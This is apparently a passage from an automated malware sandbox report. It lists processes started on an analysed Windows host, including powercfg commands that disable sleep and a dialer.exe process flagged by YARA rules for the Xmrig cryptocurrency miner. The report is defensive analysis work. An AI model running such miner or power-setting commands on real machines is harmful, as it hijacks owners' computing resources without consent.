                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:76
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:77
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:78
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dialer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\dialer.exe
                                                                                                                                                                                                    Imagebase:0x7ff643940000
                                                                                                                                                                                                    File size:39'936 bytes
                                                                                                                                                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:79
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:80
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dialer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\dialer.exe
                                                                                                                                                                                                    Imagebase:0x7ff643940000
                                                                                                                                                                                                    File size:39'936 bytes
                                                                                                                                                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:81
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dialer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:dialer.exe
                                                                                                                                                                                                    Imagebase:0x7ff643940000
                                                                                                                                                                                                    File size:39'936 bytes
                                                                                                                                                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:82
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:83
                                                                                                                                                                                                    Start time:13:59:53
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:84
Start time: 13:59:53
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase: 0x7ff62c440000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 85
Start time: 13:59:53
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase: 0x7ff62c440000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 86
Start time: 13:59:53
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase: 0x7ff62c440000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 87
Start time: 13:59:55
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase: 0x7ff62c440000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 88
Start time: 13:59:55
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase: 0x7ff62c440000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 89
Start time: 13:59:58
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase: 0x7ff62c440000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 90
Start time: 13:59:58
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase: 0x7ff62c440000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 91
Start time: 13:59:58
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase: 0x7ff62c440000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 92
Start time: 13:59:59
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase: 0x7ff62c440000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 93
Start time: 13:59:59
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase: 0x7ff62c440000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 94
Start time: 13:59:59
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase: 0x7ff62c440000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 95
Start time: 13:59:59
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
Imagebase: 0x7ff62c440000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 96
Start time: 13:59:59
Start date: 14/03/2024
Path: C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:97
                                                                                                                                                                                                    Start time:14:00:00
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:98
                                                                                                                                                                                                    Start time:14:00:01
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:99
                                                                                                                                                                                                    Start time:14:00:01
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:100
                                                                                                                                                                                                    Start time:14:00:01
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:101
                                                                                                                                                                                                    Start time:14:00:01
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:102
                                                                                                                                                                                                    Start time:14:00:02
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:103
                                                                                                                                                                                                    Start time:14:00:02
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:104
                                                                                                                                                                                                    Start time:14:00:02
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:105
                                                                                                                                                                                                    Start time:14:00:03
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:106
Start time:14:00:03
Start date:14/03/2024
Path:C:\Windows\System32\spoolsv.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\spoolsv.exe
Imagebase:0x7ff719eb0000
File size:842'752 bytes
MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:107
Start time:14:00:04
Start date:14/03/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
Imagebase:0x7ff62c440000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:108
Start time:14:00:06
Start date:14/03/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
Imagebase:0x7ff62c440000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:109
Start time:14:00:06
Start date:14/03/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
Imagebase:0x7ff62c440000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:110
Start time:14:00:07
Start date:14/03/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
Imagebase:0x7ff62c440000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:111
Start time:14:00:07
Start date:14/03/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
Imagebase:0x7ff62c440000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:112
Start time:14:00:08
Start date:14/03/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
Imagebase:0x7ff62c440000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:113
Start time:14:00:13
Start date:14/03/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
Imagebase:0x7ff62c440000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:114
Start time:14:00:14
Start date:14/03/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc
Imagebase:0x7ff62c440000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:115
Start time:14:00:14
Start date:14/03/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
Imagebase:0x7ff62c440000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:116
Start time:14:00:15
Start date:14/03/2024
Path:C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
Imagebase:0x7ff7402f0000
File size:12'859'472 bytes
MD5 hash:75F42872C0302D36A1E3BB5C7928FC02
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:117
Start time:14:00:25
Start date:14/03/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
Imagebase:0x7ff62c440000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

                                                                                                                                                                                                    Target ID:118
                                                                                                                                                                                                    Start time:14:00:26
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:119
                                                                                                                                                                                                    Start time:14:00:27
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:120
                                                                                                                                                                                                    Start time:14:00:27
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:121
                                                                                                                                                                                                    Start time:14:00:28
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s NcdAutoSetup
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:122
                                                                                                                                                                                                    Start time:14:00:28
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sihost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:sihost.exe
                                                                                                                                                                                                    Imagebase:0x7ff7cace0000
                                                                                                                                                                                                    File size:111'616 bytes
                                                                                                                                                                                                    MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:123
                                                                                                                                                                                                    Start time:14:00:30
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:124
                                                                                                                                                                                                    Start time:14:00:31
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:125
                                                                                                                                                                                                    Start time:14:00:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:126
                                                                                                                                                                                                    Start time:14:00:33
